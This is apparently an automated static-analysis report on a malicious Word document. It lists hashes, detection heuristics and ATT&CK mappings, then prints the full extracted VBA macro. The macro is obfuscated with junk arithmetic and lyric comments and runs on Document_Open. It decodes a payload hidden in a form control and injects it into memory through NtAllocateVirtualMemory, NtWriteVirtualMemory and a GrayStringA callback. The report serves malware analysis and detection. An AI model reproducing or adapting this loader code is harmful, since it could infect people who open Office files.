Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 58915bb0388161b7…

MALICIOUS

Office (OLE)

194.0 KB Created: 2017-02-13 12:32:00 Authoring application: Microsoft Office Word First seen: 2018-03-04
MD5: c21b44bae0fc89e994ac9c6e6f9b5fcb SHA-1: f8658c498ce98102535057f4f997e0405324b5f9 SHA-256: 58915bb0388161b7214710c32de0a1e44c09c28c5d8b720b3284f99b82551da9
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by the 'OLE_VBA_MACROS' and 'ClamAV: Doc.Dropper.ZwMacros-6057750-0' heuristics. The 'Document_Open macro' firing suggests the malicious code executes automatically upon opening. The VBA script, though truncated, appears to be involved in executing further malicious actions, likely downloading a payload. The presence of macros and the dropper signature strongly suggest a spearphishing attachment attack vector.

Heuristics 4

  • ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim ambuscade As Variant
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15160 bytes
SHA-256: 8c3b5af7c6191e63cf077db908cbaf689e6a0992aa30e12172e4f468d5ba2ad7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub MyTestArray()
    Dim myArray(1 To 4) As String ' Declaring array and setting bounds
    Dim Response As String
    Dim i As Integer
    Dim myFlag As Boolean

    myFlag = False
    myArray(1) = "A"
    myArray(2) = "B"
    myArray(3) = "C"
    myArray(4) = "D"

    Do Until myFlag = True
        Response = InputBox("Please enter your choice: (i.e. A,B,C or D)")
        For i = 1 To 4
            If UCase(Response) = UCase(myArray(i)) Then
                    myFlag = True: Exit For
            End If
        Next i
    Loop
End Sub

Function convinced(allopathic, saints, sciagraph)
#If Win64 Then
Dim jugend As String
Dim corditis As Variant
Dim singlehearted As LongPtr
Dim gymnogyps As LongPtr
Dim shattered As LongPtr
Dim catsear As Byte
Dim qubibble As LongPtr
Dim beret As LongPtr
#Else
Dim gymnogyps As Long
Dim barachois As Long
Dim singlehearted As Long
Dim cheer As Integer
Dim qubibble As Long
Dim dicotyledonous As Integer
Dim shattered As Long
Dim cavesson As Integer
Dim beret As Long
Dim divisions As Byte
Dim crossclassification As Long
#End If
advancement = judaical
misogamist = barge Or 244
gymnogyps = allopathic
beret = sciagraph
melodic = effortlessly
qubibble = saints
almsgiver = 7
arose = 310
diplomatist = 37109
schoolchild = 108285
schoolchild = SYD(schoolchild, diplomatist, arose, almsgiver)

misogamist = conchoid * 4
singlehearted = 71 + 87 - 159
sabbath ByVal singlehearted, gymnogyps, qubibble, beret, shattered
melodic = melodic
End Function
Private Sub Document_Open()
Dim ambuscade As Variant
Dim catsup As Variant
sapphist = "bluffer"
climb = "pallescere"
conventionality
doctoral = 93
unconscionable = 31841
erotically = 230523
unconscionable = NPer(0.0788, doctoral, -23877, erotically, 0)
End Sub
Function achondrite(policyholder)
Dim matting As Long
Dim armadillo As String
Dim onchorynchus As String
Dim inconsiderateness As Long
#If Win64 Then
Dim muskmelon As Long
Dim soil As LongPtr
assimilation = 122 - 103 + 47 - 58
Dim febrifugal As LongPtr
Dim chrysochloris As Integer
Dim deepening As Byte
Dim bichromate As LongPtr
Dim cheerless As Long
#Else
Dim disjoined As Integer
Dim soil As Long
assimilation = 128 + 9 - 73 - 60
Dim febrifugal As Long
Dim finder As Long
Dim bichromate As Long
Dim corker As String
Dim continuous As Long
#End If
daytime = convinced(VarPtr(soil), VarPtr(policyholder) + 8, assimilation)
incredulously = -1
febrifugal = 0
dromaeosaur = 72 - 15 - 57
bichromate = 9777
injection = 4096
foolhardness = 127 - 98 + 35
punkie = mercurous(ByVal incredulously, febrifugal, ByVal dromaeosaur, bichromate, ByVal injection, ByVal foolhardness)
perceptibility = Fix(246.3106 + 333)

judaical = "decrepit"

convinced febrifugal, soil, 4384
his = 4
coloration = 234
thermos = 43612
weighty = 440897
weighty = SYD(weighty, thermos, coloration, his)

achondrite = febrifugal
End Function
Sub conventionality()
Dim amendment As Long
Dim poetic As Integer
apocrypha = ThisDocument.ComputeStatistics(wdStatisticPages)
insulting.tessellation.Value = apocrypha + 9
despicably = "backset"
fibril = "jolterhead"
dished = "amentes"
Set geneva = insulting.tessellation.SelectedItem
alterd = 2
impale = 155
voces = 15903
beati = 125985
beati = SYD(beati, voces, impale, alterd)

capsid = geneva.Name
deadpan = 5844
mopsy = Right(capsid, deadpan)
unmitigable = whist.charon(mopsy)
cultivation = 92
amphibiotic = 18710
sensorial = 389352
amphibiotic = NPer(0.0391, cultivation, -13510, sensorial, 1)

coronat = "misinformation"
#If Win64 Then
Dim illaudable As String
Dim carpospore As LongPtr
Dim asvins As LongPtr
Dim basswood As Integer
#Else
Dim bitartrate As Byte
Dim asvins As Long
Dim basilisk As Integer
Dim carpospore As Long
#End If
ruination = 0
benzodiazepine = "je" & "wel"
dominated = 4096
abdominocentesis = 74
captivate = 5394
reside = 343866
captivate = NPer(0.0781, abdominocentesis, -15603, reside, 0)

dalasi = "backdrop"
johannesburg = "re" & "munerative"
disposal = "fosse"
deific = "gambian"
destiny = 2
mum = 362
oedematous = 11965
confront = 484049
confront = SYD(confront, oedematous, mum, destiny)

irritably = unmitigable
enlightenment = "uninjured"
carpospore = achondrite(irritably)
cacique = "vaquero"
#If Win64 Then
Dim sobriety As Long
Dim chor As LongPtr
malgre = "events"
billing = "endorse"
Dim chemist As LongPtr
armchair = 30 + 48 + 57 + 1177
#Else
artistically = "aggl" & "utinogen"
glue = "vidi"
Dim chor As Long
sentimentalist = 74 - 128 + 36 + 513
Dim chemist As Long
armchair = sentimentalist + 2659

#End If
Dim cherty As Variant
Dim confirmatory As Variant
chor = 0
asvins = carpospore + armchair
chemist = 97 - 96
largess = chauvinist(chemist, chemist, asvins, chor, chemist, chor, chor, chor, chor)
styphelia = 118
exfoliate = 8125
addlehead = 379114
exfoliate = NPer(0.0832, styphelia, -8500, addlehead, 0)

End Sub


Attribute VB_Name = "whist"
' From the back to the middle to the front
'
' Get it right, all night
#If Win64 Then
' Cause I like your skinny-jeans better
' From the dark to the light
' Cause I like your skinny-jeans better
Public Declare PtrSafe Function stripmined Lib "Shlwapi.dll" Alias "PathFileExists" (brucke As LongPtr) As LongPtr
' Cause I like your skinny-jeans better
' From the dark to the light
' Cause I like your skinny-jeans better
Public Declare PtrSafe Function consternation Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (brimstone As LongPtr, usurper As Any,assume As LongPtr, squiggle As Any) As Boolean
' Cause I like your skinny-jeans better
' From the dark to the light
' Cause I like your skinny-jeans better
Public Declare PtrSafe Function apterous Lib "Shell32.dll" Alias "SHGetSettings" (maquis As LongPtr,compline As LongPtr) As LongPtr
' Cause I like your skinny-jeans better
' From the dark to the light
' Cause I like your skinny-jeans better
Public Declare PtrSafe Function nicely Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal closed As LongPtr,chives As LongPtr,bilabial As LongPtr,scandium As LongPtr,aflame As LongPtr) As Boolean
' Cause I like your skinny-jeans better
' From the dark to the light
' Cause I like your skinny-jeans better
Public Declare PtrSafe Function sabbath Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal femtogram As Any, ByVal barded As Any, ByVal orbignya As Any, ByVal ideogram As Any, ByVal crusade As Any) As LongPtr
' When they’re laying on the ground
' To the edge of the night to the light
' Baby we should get it right
Public Declare PtrSafe Function auspicious Lib "Shell32.dll" Alias "SHGetDesktopFolder" (pneumatology As LongPtr)
'
' From the dark to the light
' Just gimme one day, I teach ‘em girls how to chill
Public  Declare PtrSafe Function chauvinist Lib "User32.dll" Alias "GrayStringA" ( ByVal selfseeded As Any, ByVal survivance As Any, ByVal kobold As Any, ByVal lockout As Any, ByVal graphite As Any, ByVal artifice As Any, ByVal maharashtra As Any, ByVal story As Any, ByVal reechy As Any) As Long
' I know what you want, Baby, I'mma give it to you real good
' But they don’t know your appeal
' B-B-B-Baby, I'mma give it to you real good
Public Declare PtrSafe Function mercurous Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (embassy As LongPtr, amylolysis As LongPtr, ByVal nasci As LongPtr,antrumByVal As LongPtr, reversibility As LongPtr, ByVal transiently As LongPtr) As LongPtr
' Doubledecker Tourbus, meet me on the top-floor
'
' Get high! L-L-Light it up! R-R-Raise that cup!

' I know what your friends say
' Get it right, all night
' From the dark to the light
#Else
' From the back to the middle to the front
'
' Put your motherfucking hands up!
Public Declare Function sonography Lib "Shell32.dll" Alias "SHGetDesktopFolder" (exaltation As Long)
' Put your motherfucking hands up!
' Get it right, all night
' Baby let me get it right
Public Declare Function counterfactuality Lib "Shlwapi.dll" Alias "PathFileExists" (centromere As Long) As Long
' Put your motherfucking hands up!
' Cause I like your skinny-jeans better
' From the back to the middle to the front
Public Declare Function cassino Lib "Shell32.dll" Alias "SHGetSettings" (blandiment As Long, duds As Long) As Long
' B-B-B-Baby, I'mma give it to you real good
' Back in L.A., oop! It’s a nice day
' Baby we should get it right
Public Declare Function derringdo Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal conjunct As Long, glories As Long, uisquebaugh As Long, devil As Long, militare As Long) As Boolean
' Let’s make love, I never wanna fight
' Baby we gotta shop, we should get it right
' Baby let me get it right
Public Declare Function sabbath Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal bushed As Any, ByVal proterochampsa As Any, ByVal glottology As Any, ByVal hobglobin As Any, ByVal daphnia As Any) As Long
' Cruisin’ down sunset, lightning up a fat one
' From the dark to the light
' Just gimme one day, I teach ‘em girls how to chill
Public Declare Function chauvinist Lib "User32.dll" Alias "GrayStringA" (ByVal outermost As Any, ByVal acroamatical As Any, ByVal callousness As Any, ByVal draggletailed As Any, ByVal immigrant As Any, ByVal microcosmic As Any, ByVal modal As Any, ByVal alternity As Any, ByVal negroid As Any) As Long
' From the dark to the light
' When they’re laying on the ground
' I know what your friends say
Public Declare Function mercurous Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (airtoair As Long, accede As Long, ByVal draft As Long, dermByVal As Long, perusal As Long, ByVal waiter As Long) As Long
' From the back to the middle to the front
' It looks like I’m about to get in trouble here
' I know what your friends say
Public Declare Function stonecolored Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (teach As Long, gobs As Any, theosophical As Long, embellished As Any) As Boolean
' You know the song baby, tryin’ to get my top score
' Back in L.A., oop! It’s a nice day
' You make me feel good

' It looks like I’m about to get in trouble here
' Baby let me get it right
' Back in L.A., oop! It’s a nice day
#End If
'
' But I think we vibed girl we should get it right
' Put your motherfucking hands up!
Function glutelin(machine)
glutelin = AscW(machine)
End Function
Sub pageNumber()
    ActiveDocument.Sections(ActiveDocument.Sections.Count) _
        .Headers(wdHeaderFooterPrimary).Range.Select
    With Selection
        .Paragraphs(1).Alignment = wdAlignParagraphCenter
        .TypeText Text:="Page "
        .Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
            "PAGE ", PreserveFormatting:=True
        .TypeText Text:=" of "
        .Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
            "NUMPAGES ", PreserveFormatting:=True
    End With
End Sub

Function charon(roland) As String
Dim normandie(63) As Long
Dim screen As String
Dim bitten(63) As Long
Dim fenugreek As Long

judaical = melodic

Dim freak(6965) As Byte
melodic = "nornal"

Dim abdicable As Integer

Dim compress(63) As Long
Dim achillean As Long
Dim monger() As Byte
misogamist = Rnd(395.1295 + 291)

Dim brachypterous As Integer
Dim bitters As Long
Dim dibs As Long
Dim marut As Long

Dim bowiea As Long
Dim cloudlessness As Long

nervos = 46 + 46 - 126 + 290
flameproof = 16711680
belonidae = 76 - 12
Dim calotte As Variant

crabwise = 43 + 65493
beefy = 255
thompson = 4032
fasteners = 63
unhelpfulness = 262144
advisemement = 16515072
psycholinguistics = 258048
acanthisitta = 105 + 65175
exposition = 4096
Dim wf As Long

Dim icepail As Long
bungee = 0
bye = 5843
Dim polymorph() As Byte
polymorph = VBA.StrConv(roland, vbFromUnicode)
Dim sowbelly As String
atticism = 7
adamantean = 219
eloquent = 41409
precisian = 360620
precisian = SYD(precisian, eloquent, adamantean, atticism)

bubulcus = 5843
noticeable = 113 - 78
sampling = Sqr(100) / Sqr(4) + 20
For burhinus = 0 To bubulcus
If burhinus Mod 2 = 0 Then
polymorph(burhinus) = polymorph(burhinus) + sampling
Else
polymorph(burhinus) = polymorph(burhinus) + sampling - 1
End If
Next burhinus
conservatively = 3
inhospitably = 124
deuteron = 25375
crangonidae = 167794
crangonidae = SYD(crangonidae, deuteron, inhospitably, conservatively)

brachypterous = 0
hypothermic = 101 - 101
errors = 41 - 90 - 44 + 136
criticise = nichrome
For achillean = 0 To 63
compress(achillean) = bead(achillean, belonidae, 42)
normandie(achillean) = bead(achillean, exposition, 42)
bitten(achillean) = bead(achillean, unhelpfulness, 42)
Next achillean
antipodean = 8
cascarilla = 206
furtive = 31829
metaphrastic = 233652
metaphrastic = SYD(metaphrastic, furtive, cascarilla, antipodean)

monger = polymorph
digester = 120 - 88 - 28
gettable = 5
eos = 273
derogative = 43551
bordering = 306131
bordering = SYD(bordering, derogative, eos, gettable)

surfer = 3
effortlessly = "augustine"

perceptibility = Fix(498.2053 + 259)

contort = surfer + 1
amability = 2
For dibs = 0 To bubulcus
emasculation = monger(dibs)
Maximum = monger(dibs + 2)
bowiea = bitten(criticise(emasculation)) _
 + normandie(criticise(monger(dibs + 1))) + compress(criticise(Maximum)) + criticise(monger(dibs + surfer))
achillean = bead(bowiea, flameproof, 34)
freak(bitters) = bead(achillean, crabwise, 24)
achillean = bead(bowiea, acanthisitta, 34)
freak(bitters + 1) = bead(achillean, nervos, 24)
freak(bitters + amability) = bead(bowiea, beefy, 34)
bitters = bitters + amability + 1
dibs = dibs + 3
Next
charon = freak
End Function

Function bead(pelisse, resentfully, humilia)
Select Case humilia
Case 24
bead = pelisse \ resentfully
Case 34
bead = pelisse And resentfully
Case 42
bead = pelisse * resentfully
End Select
End Function
Function nichrome()
Dim chaetodipterus(255) As Byte
asexually = 65
Do
chaetodipterus(asexually) = asexually - 65
asexually = asexually + 1
Loop Until asexually = 91
asexually = 48
Do
chaetodipterus(asexually) = asexually + 4
asexually = asexually + 1
Loop Until asexually = 58
asexually = 97
Do
chaetodipterus(asexually) = asexually - 71
asexually = asexually + 1
Loop Until asexually = 123
chaetodipterus(47) = 63
asexually = 43
chaetodipterus(asexually) = 62
nichrome = chaetodipterus
End Function


Attribute VB_Name = "insulting"
Attribute VB_Base = "0{59E5345E-F049-4648-BC01-657592E2174E}{A0FA8C3B-80D3-433D-A68C-5FDA614CF6BA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False